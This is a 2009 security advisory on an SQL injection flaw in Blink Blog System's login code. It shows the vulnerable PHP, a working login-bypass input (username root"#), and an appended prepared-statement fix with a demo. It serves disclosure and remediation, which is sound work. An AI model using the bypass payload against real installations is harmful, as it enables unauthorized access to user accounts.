******** Salvatore "drosophila" Fresta ********

[+] Application: Blink Blog System
[+] Version: Unknown
[+] Website: http://blogink.sourceforge.net

[+] Bugs: [A] Authentication Bypass

[+] Exploitation: Remote
[+] Date: 03 Aug 2009

[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com

***************************************************

[+] Menu

1) Bugs
2) Code
3) Fix

***************************************************

[+] Bugs

There are many SQL Injection flaws but I post the only one that allows a guest to bypass the login.

- [A] Authentication Bypass

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: login.php, db.php

This bug allows a guest to bypass the login.

login.php:

...
	$username = $_POST["nick"];
	$password = md5($_POST["password"]);
	if ($data = $DB->usercheck($username, $password))
...

db.php:

function usercheck($username, $password) {
	$try = mysql_query("SELECT * FROM users WHERE nick=\"".$username."\" AND password=\"".$password."\" ");
...

***************************************************

[+] Code

- [A] Authentication Bypass

username: root"#
password: foo

***************************************************

[+] Fix

No fix.

***************************************************
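
The advisory lists no fix. As an added example (not code from the advisory or from the Blink Blog System project), this is one way to rewrite usercheck() with a prepared statement so the submitted nick is bound as data. The PDO handle parameter, the in-memory SQLite demo database and the sample credentials are assumptions constructed for the illustration.

```php
<?php
// Added example: parameterized replacement for db.php's usercheck().
// Assumptions: PDO is available; the users table has the nick and password
// columns seen in the page's query; md5() is kept only to match login.php.

function usercheck(PDO $db, string $username, string $password): ?array
{
    // Placeholders keep the submitted values out of the SQL text, so quote
    // and comment characters in $username are compared as literal data.
    $stmt = $db->prepare('SELECT * FROM users WHERE nick = ? AND password = ?');
    $stmt->execute([$username, $password]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // null is falsy, so "if ($data = usercheck(...))" in login.php still works.
    return $row === false ? null : $row;
}

// Constructed demo data in an in-memory SQLite database. The application
// itself uses MySQL; the prepare/execute calls are the same with pdo_mysql.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (nick TEXT, password TEXT)');
$db->prepare('INSERT INTO users VALUES (?, ?)')
   ->execute(['root', md5('constructed-secret')]);

$attempts = [
    ['root',   'constructed-secret'],  // valid login
    ['root"#', 'foo'],                 // the input from the advisory
    ['root',   'foo'],                 // wrong password
];

foreach ($attempts as [$nick, $pass]) {
    $ok = usercheck($db, $nick, md5($pass)) !== null;
    printf("%-8s => %s\n", $nick, $ok ? 'accepted' : 'rejected');
}
```

With pdo_mysql, setting PDO::ATTR_EMULATE_PREPARES to false makes the MySQL server bind the parameters itself rather than having PDO build the query string client-side.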